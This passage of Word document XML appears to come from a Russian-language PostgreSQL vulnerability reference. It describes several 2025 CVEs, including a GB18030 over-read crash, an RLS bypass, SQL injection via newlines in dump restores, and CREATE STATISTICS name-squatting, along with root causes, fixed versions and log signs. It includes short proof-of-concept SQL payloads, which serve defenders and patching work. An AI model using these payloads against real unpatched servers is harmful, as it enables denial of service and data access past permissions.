        </w:rPr>
        <w:t xml:space="preserve">CVE-2025-4207 — GB18030 buffer over-read (полная карточка)</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Validation-функция для encoding GB18030 читала 1 байт за границей выделенного буфера при специально сконструированной обрезанной multi-byte sequence. На платформах, где это вызывает SIGSEGV (большинство Linux/BSD сборок), процесс postgres или libpq-приложения терминируется → DoS. Затрагивает и сервер, и libpq-клиент. Не SQL injection — bounds-checking failure в C-коде валидатора кодировки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Минимальный payload (концептуальный).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Конкретный PoC требует сырых байтов в GB18030-форме с обрезанной</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- multi-byte sequence (последний байт — start_of_4byte_char без 3 следующих).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET client_encoding = 'GB18030';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT '&lt;crafted GB18030 byte sequence: F0 81 ... obрезанные финальные bytes&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Эффект — сервер падает с segfault либо libpq-клиент крашится на parse-стадии</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- результата.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Точные байты конкретной формы — в PoC, ссылки на которые есть в IBM bulletin (см. источники ниже).</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Server-side: процесс postgres (postmaster backend для конкретной сессии) терминируется по SIGSEGV; postmaster переподнимает worker, но активная сессия теряется → effective DoS для атакующего connection. Client-side: то же для psql и любого приложения через libpq — crash клиента при чтении результата. На теоретическом уровне возможен 1-байтовый information leak (содержимое читаемого "лишнего" байта), но в практических scenarios это не daje полезных данных.</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Validation-функция GB18030 при встрече с potential start-byte 4-байтовой sequence пробовала прочитать 3 next bytes для проверки valid range; bounds-check на длину буфера был неполным — читался один лишний байт за границей. Bug-class — off-by-one в multi-byte encoding validators, родственный bug-классу overflow checks (R13). Фикс — explicit length-check перед каждым read в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">src/backend/utils/mb/encnames.c</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wchar.c</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Любой authenticated user с правом подключения и установки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">client_encoding = GB18030</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Никаких особых привилегий, никаких расширений. На большинстве production-deployments GB18030 не используется (китайский enterprise pgcluster — основной target), но bug срабатывает при любом установлении этого encoding, что делает атаку доступной любой роли.</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Затронуто (≤): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">17.4, 16.8, 15.12, 14.17, 13.20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Фикс: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">17.5, 16.9, 15.13, 14.18, 13.21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (08.05.2025).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Как выглядит атака в логах.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Server log — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">server process (PID N) was terminated by signal 11: Segmentation fault</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> сразу после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET client_encoding = 'GB18030'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от сессии.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частые </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET client_encoding = $1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от ролей, не работающих с азиатскими encoding-ами; повторные disconnect-ы одного клиента с интервалом, типичным для попытки exploit-варианта.</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DoS class; концептуально близка к R13 (CVE-2023-5869, array integer overflow) — оба про bounds-checking failures в C-коде. R10 (CVE-2024-10977, libpq MITM) — родственное направление clean-up libpq. R14 (CVE-2023-5868, aggregate memory disclosure) — соседний memory-class CVE.</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IBM Security Bulletin (multiple CVEs)</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CVE-2025-8713 — optimizer statistics → bypass view ACL / RLS</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Custom operator с pluggable selectivity-функцией (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">scalarltsel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eqsel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> analogues) при оценке селективности на планировочной фазе получал значения из MCV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underlying-таблицы и передавал их в пользовательскую functions без проверки column-ACL и RLS. Атакующий, способный создать custom operator (требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE OPERATOR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читает фрагменты данных view и RLS-protected tables в обход policies.</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17.5, 16.9, 15.13, 14.18, 13.21.</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17.6, 16.10, 15.14, 14.19, 13.22 (14.08.2025). CVSS — не указан в advisory; GBHackers оценивает как Medium.</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3.17.4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2025-8715 — newline в object names → SQL injection при restore</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Атакующий с правом создавать объекты в БД вставляет newline (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">chr(10)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) в имя объекта — функции, schema, table. Этот символ попадает в SQL-комментарий внутри dump-файла (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- COMMENT ON ... IS '...'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или подобные). При restore — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psql &lt; dump.sql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pg_restore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — newline разрывает комментарий и следующие за ним байты исполняются как SQL-команды на стороне restore-host.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достижима client-side RCE на машине DBA, выполняющего restore. Регрессия CVE-2012-0868: fix 2012 года покрыл основные case-ы, но не plpgsql-функции и не interaction с pg_restore meta-commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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17.5, 16.9, 15.13, 14.18, 13.21.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Фикс:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 17.6, 16.10, 15.14, 14.19, 13.22 (14.08.2025).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Деталь:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> см. 3.12.3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2025-12817 — CREATE STATISTICS без CREATE-привилегии (полная карточка)</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Owner таблицы мог создать extended statistics object (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE STATISTICS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) с произвольным именем в любой схеме без проверки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privilege на target schema. Атакующий, владеющий любой собственной таблицей, занимает имена statistics в чужих схемах — следующая попытка legitimate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE STATISTICS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от administrator-а падает с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">relation already exists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Класс — misauth + DoS через name-squatting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Минимальный payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Как atak_user, owner таблицы atak.t1 (создал её сам):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE STATISTICS public.payments_dependency_stats ON c1, c2 FROM atak.t1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Проходит, хотя atak_user не имеет CREATE на схему public.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Теперь admin пытается создать legitimate stats:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE STATISTICS public.payments_dependency_stats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ON customer_id, payment_method FROM public.payments;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ERROR: relation "payments_dependency_stats" already exists</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DoS для администратора: legitimate workflow для оптимизации запросов сломан; для удаления squatted-stats нужно либо подключиться от owner-а (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">atak_user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — может быть удалён, тогда требуется superuser), либо использовать superuser напрямую. Дополнительный аспект — нарушение schema permission model: stats-объект существует в чужой схеме без CREATE-права, что нарушает контракт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ACL контролирует все объекты в схеме».</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Privilege-проверка в code-path </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CreateStatistics()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src/backend/commands/statscmds.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) включала проверку CREATE на схему </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через owner-flag base table, но логика была неполной — owner таблицы получал право на CREATE STATISTICS в любой схеме как side-effect ownership. Фикс — explicit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ACL_CREATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> check на target schema независимо от ownership base table. Этот path existed since the introduction of extended statistics (PG 10+), однако CVE присвоен только в 2025-м.</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Owner любой таблицы. Так как любая роль с CREATE на любой схеме может стать owner-ом (создав таблицу), порог практически нулевой — это применимо в multi-tenant deployments, где tenant-role имеет CREATE на свою tenant-schema.</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Затронуто (≤): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">18.0, 17.6, 16.10, 15.14, 14.19, 13.22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Фикс: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">18.1, 17.7, 16.11, 15.15, 14.20, 13.23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
